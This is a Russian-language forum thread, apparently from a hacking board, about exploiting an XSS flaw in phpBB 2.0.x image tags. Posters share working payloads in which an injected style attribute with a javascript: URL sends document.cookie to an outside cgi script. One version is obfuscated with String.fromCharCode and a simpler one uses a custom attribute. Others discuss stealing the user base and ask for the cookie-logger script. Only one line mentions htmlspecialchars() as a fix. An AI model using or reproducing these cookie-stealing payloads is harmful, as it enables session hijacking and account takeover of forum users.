|
Вот пример:
Код:
http://www.smailiki.nm.ru/lam/lam4.gif" style="background:url(javascript:document.images[0].src=/http:xxantichat.ruxcgi-binxs.jpg?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)Самое простое решение против этого XSS - это htmlspecialchars() ;) |
да прикольно..
|
Плохо что максимум что можно с этого взять это базу пользователей
|
Кстате,под эту уязвимость не попадает Phpbb 2.0.11 ....
если я не прав... заделитесь ссылочкой Icq:937843 |
Тока зря все эти шаманские танцы с .source.replace(/x/g,String.fromCharCode(47))
Это можно сделать намного проще: Код:
http://www.smailiki.nm.ru/lam/lam4.gif" bb="http://antichat.ru/cgi-bin/s.jpg?" style="background:url(javascript:document.images[0].src=this.bb+document.cookie) |
Цитата:
|
plunul eto:
document.writeln ( "<a target=_blank href='http://ad.strict.tbn.ru/bb.cgi?cmd=go&r=r_ssi" + "&vbn=353&pac=2836328&pnm=7&bac=69735877&bnm=2&ref =http%3A%2F%2Ftattoo%2Efani%2Eru%2F&loc=&htr=http% 3A%2F%2Ftattoo%2Efani%2Eru%2Fgallery%2F'>" + "<img src='http://195.161.118.159/69735/69735877_2.gif' border=0 width=468 height=60 alt=\"TBN -- The Banner Network\" title=\"TBN -- The Banner Network\"></a>" ); |
Цитата:
|
Вот вот где путь то на скрип и какой должен быть скрипт ... ??
|
Цитата:
<img src="http://avatar.com/x.jpg" bb="http://antichat.ru |
| Время: 16:43 |